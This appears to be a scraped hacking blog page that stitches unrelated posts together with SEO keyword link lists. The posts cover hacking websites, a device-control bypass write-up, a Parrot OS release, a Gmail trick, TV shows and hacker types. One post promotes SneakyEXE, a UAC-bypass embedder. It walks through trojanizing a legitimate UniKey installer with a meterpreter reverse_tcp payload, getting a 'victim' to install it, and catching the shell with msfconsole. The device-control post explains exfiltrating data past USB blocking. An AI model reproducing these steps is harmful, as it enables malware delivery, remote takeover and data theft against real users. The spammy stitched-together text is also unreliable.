Top 15 Best Websites To Learn Ethical Hacking

1. Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
2. KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
3. DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
4. SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
5. Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
6. NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
7. HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
8. Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
9. Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
10. Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
11. Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
12. The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
13. Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
14. Phrack Magazine: Digital hacking magazine.
15. SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.

Tricks To Bypass Device Control Protection Solutions

Preface

As I wrote in a previous blog post, I had an engagement last year where my task was to exfiltrate data from a workstation on some sort of storage media. The twist in that task was Lumension Sanctuary Device Control, and the version was 4.3.2, but I am not sure how newer version work and this seems to be a more general problem with device control solution, for example with Symantec products.

But what is a device control solution? In short, they audit I/O device use and block the attempts to use unauthorized devices. This includes hardware such as USB, PS/2, FireWire, CD/DVD so basically every I/O port of a computer. In my opinion, these are pretty good things and they offer a better looking solution than de-soldering the I/O ports from the motherboards or hot-gluing them, but on the other hand, they can be bypassed.

Bypass

OK, so what is the problem? Well the way these device control solutions work is that they load a few kernel drivers to monitor the physical ports of the machine. However... when you boot up the protected computer in safe mode, depending on the device control solution software, some of these drivers are not loaded (or if you are lucky, none of those modules will be loaded...) and this opens up the possibility to exfiltrate data.

In theory, if you have admin (SYSTEM maybe?) privileges, you might as well try to unload the kernel drivers. Just do not forget, that these device control solutions also have a watchdog process, that checks the driver and automatically loads it back if it is unloaded, so look for that process and stop or suspend it first.

In my case with the Lumension Sanctuary Device Control, I have found that when I boot the Workstation protected by the device control software in Safe Mode where, software's key logger protection module is not running... so I was still unable to use a USB stick, or a storage media, but I could plug in a keyboard for example...hmmm :)

As some of you probably already figured it out, now it is possible to use a pre-programmed USB HID, for example a Teensy! : ) I know about three different project, that uses this trick like these two mentioned in a Hackaday post, or this one. Unfortunately, the site ob-security.info no longer seems to be available (well, at least it is no longer related to infosec :D ), but you can still find the blog post and the files with the Wayback Machine.

For the hardware part, the wiring of the Teensy and the SD card adaptor is the same as I showed in the post on Making a USB flash drive HW Trojan or in the Binary deployment with VBScript, PowerShell or .Net csc.exe compiler post, so I will not copy it here again.

I have to note here that there are other ways to bypass these device control solutions, like the method what Dr. Phil Polstra did with the USB Impersonator, which is basically looks for an authorized device VID/PID and then  impersonates that devices with the VID/PID.

Mitigation

Most probably, you will not need safe mode for the users, so you can just disable it... I mean, it is not that easy, but luckily there is a great blog post on how to do that. BTW, the first page of the post is for Windows XP, but you are not using XP anymore, aren't you? ;)

Alternatively, as I mentioned at the beginning, you might as well use some physical countermeasure (de-soldering/hot-gluing ports). That shit is ugly, but it kinda works.

Conclusion

Next time you will face a device control solution, try out these tricks, maybe they will work, and if they do, well, that's a lot of fun. :)

But don't get me wrong, these device control solutions and similar countermeasures are a good thing and you should use something like this! I know that they make doing business a bit harder as you are not able to plugin whatever USB stick you want, but if you buy a pile of hardware encrypted flash drives, and only allow  those to be plugged in, you are doing it right ;)

More articles

• Hacking Script
• Pentest Meaning
• Hacker Lab
• Pentest Ftp
• Hacking Language
• Hacker Videos
• Pentest Azure
• Hacking With Raspberry Pi
• Pentest Aws
• Pentest Vs Red Team
• How To Pentest A Website
• Hacker Forum
• Hacking Gif
• Pentest Methodology

Parrot Security OS 4.7 Released With New Linux Kernel, Menu Structure, Tools Improvements And Many Changes

In Sep 18 2019, Parrot Security OS 4.7 has released, with many new following changes below.

Latest Linux 5.2.x series
   The new ISO files of Parrot 4.7 are being released only now, but we were the first Debian derivative distribution to introduce Linux 5.1 and 5.2 to all our users, and now ParrotSec team is ready to offer it also with our ISO files rebild cycle to support more devices and integrate all the latest linux features from the beginning.

New sandbox behavior (opt-in rather than opt-out)
   Sandboxing is a great thing, and ParrotSec team was in the first line when they introduced our custom Firejail and AppArmor solution for the first time many years ago. We still want to improve such feature and ParrotSec team has a whole team dedicated to improve sandboxing and hardening of the Parrot Security OS system, but ParrotSec team had to face the many users with issues caused by the restrictions of our sandbox.

   In Parrot Security OS 4.7 the sandbox is disabled by default, and users can decide wether to start an application sandboxed or not. You can easily start the sandboxed version of an installed program from the /sandbox/ folder or from a dedicated menu that ParrotSec team plans to improve in the future (meanwhile the search feature of the bottom menu will fit all your needs), or you can re-enable it by default by using the firecfg tool.

New menu structure and tools improvements
   The pentesting menu structure was refactored and re-designed to make tools easier to access in a more logical hierarchical structure. New tools were also added to the project, and ParrotSec team plans to add even more in the future. Not all of them are going to be pre-installed, but a good set of tools in our repository enables pentesters to build up the perfect pentest system for their specific needs, regardless the default package selection picked by ParrotSec team.

Domain changes
   To reflect the neutrality of a distro that started as a pentest-only system and became more general purpose later with Parro Home, the community voted through a democratic process to switch to parrotlinux.org as the new default domain of the project.

   ParrotSec team will still use ParrotSec.org for other things (included the old email addresses), and they introduced other project domains to handle specific parts of the infrastructure.

Repository changes
   ParrotSec team is preparing to integrate a future LTS branch, so they decided to rename the current repository from stable to rolling. Nothing changes for the end user, and the current Parrot Security OS branch will continue to behave the same as before, but now with a different name to better reflect the rolling release nature of the system, waiting for the LTS edition to join the Parrot Security OS family along side the rolling branch in a similar way OpenSUSE does.

New MATE 1.22 release: Parrot Security OS 4.7 ships with the latest MATE 1.22 desktop environment.

Miscellaneous: New Firefox Browser 69, the latest Radare2 and cutter versions and many other important upgrades are all aboard as expected in a properly developed rolling release distro.

How to upgrade to the lastest Parrot Security OS version
   You can update your existing Parrot Security OS system with this command:
sudo parrot-upgrade

   Or use the raw apt command
sudo apt update
sudo apt full-upgrade

   Don't forget to use this command regularly (at least once a week) to receive the latest security updates and bugfixes from the Parrot Security OS repository.

   Or you can download the latest release from official download page.

From Parrot Project Blog

Related links

• Hacking Jailbreak
• Hacker Lab
• Pentest Vs Ceh
• Pentest+ Vs Ceh
• Pentest Azure
• Hacking
• Pentest Services
• Pentest Website
• Pentest Wifi
• How To Pentest A Network
• Hacking Simulator
• Pentest Open Source
• Hacking Page
• Hacking Games

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload

About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:

• Windows 7, 8, 10 (64 bit)
• Parrot Security OS 4.7

   Requirements of SneakyEXE:

• For Linux:   Architecture: Optional
     Python 3.7.x: Yes
     Module: termcolor
     Distro: Any
     Distro version: Any
• For Windows:   Architecture: x86_64
     Python 3.7.x: No
     Module: No
     Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:

• For Debian-based distros: sudo apt install python3
• For Arch Linux based distros: sudo pacman -S python3

   And then, open your Terminal and enter these commands:

SneakyEXE's Installtion for Windows

• Download SneakEXE-master zip file.
• Unzip it into your optional directory.
• Change dir to \SneakyEXE\Win32\.
• Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
• (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)

   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe

How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit

   and wait...

Disclaimer:

• This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
• Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.




Download SneakyEXE

Related news

• Pentest Companies
• Pentest Ftp
• Pentest Vs Red Team
• Pentest Box
• Rapid7 Pentest
• Hacker Videos
• Pentest Meaning
• Pentest Website
• Pentest Bootcamp
• Hacking For Dummies
• Pentest+ Vs Oscp
• Hacker Keyboard
• Pentest Windows 7
• Hacking With Linux
• Hacking Process

HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

When it comes to email providers, there's no competitor to Google's awesome features. It is efficient which connects seamlessly with the rest of your Google products such as YouTube, Drive, has a major application called Gmail Inbox, and is overall an extremely powerful email service. However, to use it with a custom domain, you need to purchase Google Apps for either $5 or $10/month, which for casual users is a bit unnecessary. On top of that, you don't even get all of the features a personal account gets, e.g. Inbox. So, here's a free way to use your Gmail account with a custom domain. I am just going to show you hacking Gmail for free custom domain email.

SO, HOW HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

PASSWORD: EHT

STEPS:

• First, register with Mailgun using your Gmail address. Use your Gmail only. Once you have clicked the confirm link, log in to the Mailgun website. Now you're in the dashboard, move on the right under "Custom Domains", click "Add Domain".
• Follow the setup instructions and set DNS records with whoever manages your DNS. Once you've done this, click on the "Routes" link on the top to set up email forwarding.
• Now move to the Route tab and click on Create New Route.
• As you click the button, you will see a page like below. Just enter the information as entered in the following screenshot.
• Just replace the quoted email with your desired email in the above-given screenshot.
• Next, we'll setup SMTP configuration so we would be able to send emails from an actual server. Go to "Domains" tab, click on your domain name.
• On this page, click "Manage your SMTP credentials" then "New SMTP Credential" on the next page.
• Type in the desired SMTP credentials. And, go to Gmail settings and click "Add another email address you own". Once you open, enter the email address you wish to send from.
• In the next step, set the SMTP settings as follows.
• After clicking "Add Account" button, now you're done.
• The final step, make sure to set it to default email in the Gmail settings > Accounts.

That's all. Now you got free Gmail custom domain with 10,000 emails per month. Hope it will work for you. If you find any issue, just comment below.

---

Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.

Read more

1. Hacking Browser
2. Pentest Os
3. Hacker Attack
4. Pentest Wordpress
5. Pentest Tools Github
6. Hacking Attack
7. How To Pentest A Website With Kali
8. Pentest With Kali Linux
9. Hacking Network
10. Pentest Vs Red Team
11. Hacking Forums
12. Pentesting And Ethical Hacking
13. Hackerx
14. Hacking Games Online

DeepEnd Research: Analysis Of Trump's Secret Server Story

 We posted our take on the Trump's server story. If you have any feedback or corrections, send me an email (see my blog profile on Contagio or DeepEnd Research)

Analysis of Trump's secret server story...

Read more

• Pentest Vs Ethical Hacking
• Hacking With Linux
• Hacker Wifi Password
• Pentest Tools
• Pentest Web Application
• Pentest Stages
• Pentest Usb
• Hacking Jailbreak
• Pentest Jobs

Top 5 Best TV Series Based On Hacking & Technology 2018

Top 5 Best TV Series Based On Hacking & Technology 2018

Top 5 Best TV Series Based On Hacking And Technology 2018

Well, if you are a tech fanatic then you will love watching TV shows which are based on hacking and technology. If you are a tech geek, then you will know that hacking stuff in movies/serials always generates glamor and mystery and adds that special oomph factor to the movie or Tv SHOW.

However, there are not much movies/ or TV serials made on hacking and technology. Technology is rapidly becoming the key point in human lives. The previous year we have seen how hackers had made their marks on giant companies. So, in this article, we are going to discuss top TV shows which have to hack as the central theme. So, have a look at the list.

#1 Mr. Robot

Mr. Robot: Best TV Series Based On Hacking & Technology 2018

Well, the reason why I listed Mr. Robot on the top is because this show has millions of followers and this is the first show that portrays an elite hacker. The elite hacker group uses computers, smartphones and many other technologies to penetrate secure network to take down evil corporation while being anonymous. The show displays the life of a young programmer named Elliot who works as a cyber-security engineer and a vigilante hacker by night.

#2 Silicon Valley

Silicon Valley

This TV series displays the tech and hacking with a bit of comic touch. The series shows the competition between techies in the high-tech gold rush of modern Silicon Valley. What's more interesting is the people who are more qualified are least successful whereas underdogs are making it big. This show is running successfully for three years now.

Read more;- How To Hack Any Game On Your Android Smartphones

#3 The IT Crowd

The IT Crowd

The IT Crowd is very popular series and is running successfully for eight years from 2006 to 2013. It is not like Mr.Robot it has its moments of hacks. The series shows the comedic adventures of a rag-tag group of technical support workers at a large corporation.

#4 Person Of Interest

Person Of Interest

It is one of the best TV series made till now. You will get to see the humor, twists, and lots of other things. In this show and intelligent programmer built and AI (Artificial intelligence) that helps to stop the crimes in the city. The show will definitely give you chills.

Read more;- Top 5 Free Online Courses To Learn Artificial Intelligence

#5 Chuck

Chuck: Best TV Series Based On Hacking & Technology 2018

The TV series was somehow popular and ran from 2007 to 2013. The show shows the character of a young hacker and nerd who accidentally downloads US Govt, secrets into his brain and there is where the story starts CIA and NSA agents protect him and at the same time exploit him.

More info

• Hacking Quotes
• Pentest Standard
• Hacking Tools
• Pentest+ Vs Oscp
• Pentest Vs Ceh
• Hacking Tools
• Pentest Aws
• Pentest Tools Free
• Hacker Website
• Hacker Code
• Pentest Os
• Pentest Website
• Hacking Page
• Hacking With Raspberry Pi
• Hacking Site
• Pentest With Metasploit
• Hacking Bluetooth
• Pentest Vs Ceh

TYPES OF HACKER

7 Types of hacker 

1-Script Kiddies-They are  just download overused software & watch youtube video on how to use it. Script kiddies don't care about hacking.

2-White Hat-They are the good guys of the hacker world. They also known as Ethical Hacker.

3-Black Hat-They finds bank or other companies with weak security and steal money or credit card information. They also known as cracker. They are dangerous because they are illegal to gain unauthorized access.

4-Gray Hat-They don't steal money or information sometimes they deface a website or they don't help people for good.

5-Green Hat-These are the hacker "noobz" but unlike Script Kiddies.They care about Hacking  and strive to become full-blown hacker.

6-Red Hat-These are the vigilantes of the hacker world. They are like White Hats in that they halt Black Hats but these folks are downright SCARY to those who have ever tried so much as penetrest.

7-Blue Hat-If a Script Kiddy took revenge he/she might become a Blue Hat.Most Blue Hats are noobz.They have no desire to learn.

Related word

1. Pentest Firewall
2. Pentest Uk
3. Hacking Linux
4. Pentest Smtp
5. Hacking Apps
6. Hacking
7. Pentest News
8. Hacking With Linux
9. Pentest Bootcamp
10. Pentest Magazine

AutoNSE - Massive NSE (Nmap Scripting Engine) AutoSploit And AutoScanner

Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html

Installation

$ git clone https://github.com/m4ll0k/AutoNSE.git
$ cd AutoNSE 
$ bash autonse.sh

Exmaples

$ bash autonse.sh

Download AutoNSE

Related news

• Pentest+ Vs Ceh
• Pentest With Kali
• Hacking Process
• Hacking Vpn
• Pentest Jobs
• Hacking Gif
• Pentest Smtp